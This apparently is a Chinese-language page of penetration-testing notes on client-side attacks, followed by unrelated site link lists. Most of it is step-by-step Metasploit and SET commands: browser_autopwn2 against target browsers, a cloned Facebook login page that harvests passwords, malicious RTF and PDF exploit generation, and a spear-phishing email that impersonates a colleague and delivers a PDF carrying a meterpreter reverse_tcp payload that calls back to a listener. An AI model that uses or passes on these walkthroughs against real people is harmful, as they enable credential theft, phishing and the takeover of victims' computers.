浏览器攻击

browser_autpwn2 (BAP2)

 mkdir /test  为接受响应的服务器创建目录 
  use auxiliary/server/browser_autopwn2
  set SRVHOST 192.168.56.1
  set URIPATH /test
   #假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
    set EXCLUDE_PATTERN android|adobe_flash   
    show advanced    查看高级选项的完整列表
    set ShowExploitList true
    set VERBOSE true
 exploit
 使目标浏览器访问http://192.168.56.1/test

窃取浏览器登录凭证
root@bt:# service apache2 start
root@bt:# setoolkit

Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner

IP address for the POST back in Harvester/Tabnabbing: 填写本机IP

set:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面)

此时会在/var/www/中生成3个文件,保存在html文件夹中,此时访问本机ip时,则会出现相同登录页面,若目标登录,会把密码储存在生成的harvester文件中

Office

ms10_087漏洞,执行自定义的exe文件

msf > db_status  postgresql selected, no connection
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
msf > search office
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[+] msf.rtf stored at /root/.msf4/local/msf.rtf

root@kali:~# cd /root/.msf4/local 生成的msf.rtf
/*************************************************************************/

PDF

use exploit/windows/fileformat/adobe_utilprintf  
(Adobe Reader版本应低于8.1.2)
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

从PDF中分析和提取payload可以使用 PDF Stream Dumper 工具

恶意PDF分析可以参考:

https://zeltser.com/analyzing-malicious-documents/

https://zeltser.com/peepdf-malicious-pdf-analysis/

MailAttack

set> 1   Social-Engineering Attacks
set> 1   Spear-Phishing Attack Vectors
set:phishing>1    Perform a Mass Email Attack
set:payloads>6    Adobe CoolType SING Table "uniqueName" Overflow
set:payloads>2    Windows Meterpreter Reverse_TCP set:payloads> Port to connect back on [443]: All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool. =
ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E

然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。

把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上(关闭防病毒软件),打开template.pdf,修改后拷贝回原目录下,覆盖原有的template.pdf

set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf
set:phishing>1 E-Mail Attack Single Email Address
set:phishing>2 One-Time Use Email Template
set:phishing> Subject of the email:ABC Project Status
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: Hi Wang:
Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice.
Next line of the body:
Next line of the body: Best Regard!
Next line of the body: li Ming
Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.com set:phishing>2 Use your own server or open relay
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> Username for open-relay [blank]:yourname
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes

kali客户端攻击的更多相关文章

  1. 对客户端攻击:adobe_toolbutton

    对客户端攻击:adobe_toolbutton 漏洞简介 远程攻击者可以利用漏洞执行任意指令.当用户打开特定pdf就可以触发payload. 实践过程 输入命令use exploit/windows/ ...

  2. kali 密码攻击

    第八章 密码攻击 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 这一章中,我们要探索一些攻击密码来获得用户账户的方式.密 ...

  3. 关于如何通过kali linux 攻击以及破解WPA/WPA2无线加密

    http://blog.csdn.net/wingstudio_zongheng/article/details/51435212 1.前期准备 1)打开一个终端  执行命令: ifconfig   ...

  4. Kali密码攻击之——离线攻击工具

    在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均 ...

  5. Kali下Ettercap 使用教程+DNS欺骗攻击

    一.Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具.它具有动态连接嗅探.动态内容过滤和许多其他有趣的技巧.它支持对许多协议的主动和被动分析,并包含许多用于网络和 ...

  6. Kali Linux 秘籍/Web渗透秘籍/无线渗透入门

    Kali Linux 秘籍 原书:Kali Linux Cookbook 译者:飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 Github Git@OSC 目录: 第一章 安装和启动Kali ...

  7. ApacheCN Kali Linux 译文集 20211020 更新

    Kali Linux 秘籍 中文版 第一章 安装和启动Kali 第二章 定制 Kali Linux 第三章 高级测试环境 第四章 信息收集 第五章 漏洞评估 第六章 漏洞利用 第七章 权限提升 第八章 ...

  8. PHP安全之Web攻击

    一.SQL注入攻击(SQL Injection) 攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令.在某些表单中,用户输入的内容直接用来构造(或者影响)动态 ...

  9. web攻击和防御措施

    1.SQL注入:参照下面的链接 http://www.cnblogs.com/chenhaoyu/p/8758888.html 2.跨网站脚本攻击(Cross Site Scripting, XSS) ...

随机推荐

  1. C#类的初始化

      类的构造函数 类的构造函数,有实例构造函数和静态构造函数.如果我们没有构造函数,系统会为我们生成一个默认构造函数,如果我们已经定义了构造函数,系统就不会再为我们生成构造函数. class Simp ...

  2. SharePoint RBS 安装(集成Office Web Apps)

    前言 本文完全原创,转载请说明出处,希望对大家有用. 本篇博客是个人总结,一方面以便日后查看,另一方面希望能为其他人提供一些便利. 阅读目录 安装RBS 为多个内容数据库开启RBS 正文 目的:在Sh ...

  3. 如何理解signal函数声明

    Signal函数用起来其实很简单,但是回头看看他的声明,相信会有很多人表示费解.自己也在这个问题中纠结了好几年了,今天终于弄明白,很是兴奋,一起分享一下. 先看函数原型:void (*signal(i ...

  4. 解决GOOGLE不能用的办法

    解决GOOGLE不能用的办法 首先平时用用百度还是足够了,但是说实话,百度在进行一些尝试搜索时真的没GOOGLE好用,经常找到一大堆广告,却不是自己想要的,比如搜索里面的双引号.and.site.fi ...

  5. QSQL导出mapfile和mapfile中PostGIS连接的一点心得

    昨天弄QSQL导出mapfile,一直遇到下图的错误 原因是QGIS在渲染图层时候使用了新的符号,在图层上右键-属性,如下图将符号修改就OK了 然后我尝试使用QGIS连接本机PostGIS数据,结果老 ...

  6. yowsup ( an application to use whatsapp) hack

    yowsup, in python https://github.com/tgalal/yowsup try this: http://hacktracking.blogspot.com.ar/201 ...

  7. Broadcast Reveiver作用

    Broadcast Reveiver作用以及为何要引入(用来接收系统以及自定义消息的) 在系统内通知和判定执行状态 1,系统执行状态,开机了,TF卡插拔,准备关机,电量低了, 2,自定义执行状态,发消 ...

  8. QTime中currentTime()的使用方法

    QTime中currentTime()的使用方法 QTime是Qt中一个处理时间的类,其成员函数currentTime()是最经常用到函数,下面举例说明该成员函数如何使用. 1. 包含头文件 #inc ...

  9. Servlet的ClassLoader

    摘自深入java web技术内幕修订版

  10. 部署 instance 到 OVS vlan100 - 每天5分钟玩转 OpenStack(138)

    上一节创建了 OVS vlan network vlan100,今天部署 instance 到该网络.launch 新的 instance “cirros-vm1”,网络选择 vlan100. cir ...